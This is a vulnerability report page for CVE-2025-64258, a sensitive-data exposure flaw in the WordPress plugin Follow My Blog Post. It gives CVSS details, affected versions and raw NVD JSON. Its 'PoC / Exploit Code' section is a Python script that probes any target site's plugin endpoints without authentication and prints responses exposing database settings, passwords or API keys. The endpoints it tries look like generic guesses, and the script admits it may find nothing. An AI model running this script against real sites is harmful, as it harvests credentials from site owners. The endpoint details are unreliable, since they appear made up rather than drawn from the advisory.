Security Vulnerability Report
中文
CVE-2025-64258 CVSS 7.5 HIGH

CVE-2025-64258

Published: 2025-12-18 08:16:13
Last Modified: 2026-01-29 19:04:21

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in wpweb Follow My Blog Post follow-my-blog-post allows Retrieve Embedded Sensitive Data.This issue affects Follow My Blog Post: from n/a through <= 2.3.9.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wpwebelite:follow_my_blog_post:*:*:*:*:*:wordpress:*:* - VULNERABLE
Follow My Blog Post <= 2.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64258 PoC - WordPress Follow My Blog Post Sensitive Data Exposure # Affected Version: <= 2.3.9 # CVSS: 7.5 (High) import requests import sys import re def exploit_cve_2025_64258(target_url): """ Exploit for CVE-2025-64258: WordPress Follow My Blog Post Plugin allows unauthorized retrieval of embedded sensitive data. """ print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-64258...") # Common vulnerable endpoints endpoints = [ "/wp-admin/admin-ajax.php?action=fblp_get_data", "/wp-content/plugins/follow-my-blog-post/inc/api.php", "/wp-json/wp/v2/follow-blog/data", "/?rest_route=/fblp/v1/sensitive-data" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/html, */*', 'X-Requested-With': 'XMLHttpRequest' } for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200 and ('wp-config' in response.text or 'DB_NAME' in response.text or 'password' in response.text.lower() or 'api_key' in response.text.lower()): print(f"[+] VULNERABLE! Found sensitive data at: {endpoint}") print(f"[+] Response snippet:") print(response.text[:500]) return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[-] No obvious vulnerability endpoint found, manual testing required") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-64258.py <target_url>") print("Example: python cve-2025-64258.py http://example.com") sys.exit(1) exploit_cve_2025_64258(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64258", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:12.927", "lastModified": "2026-01-29T19:04:20.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in wpweb Follow My Blog Post follow-my-blog-post allows Retrieve Embedded Sensitive Data.This issue affects Follow My Blog Post: from n/a through <= 2.3.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wpwebelite:follow_my_blog_post:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.4.0", "matchCriteriaId": "676F7453-CEF5-4A9B-B84B-774E4F1E2827"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/follow-my-blog-post/vulnerability/wordpress-follow-my-blog-post-plugin-2-3-9-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}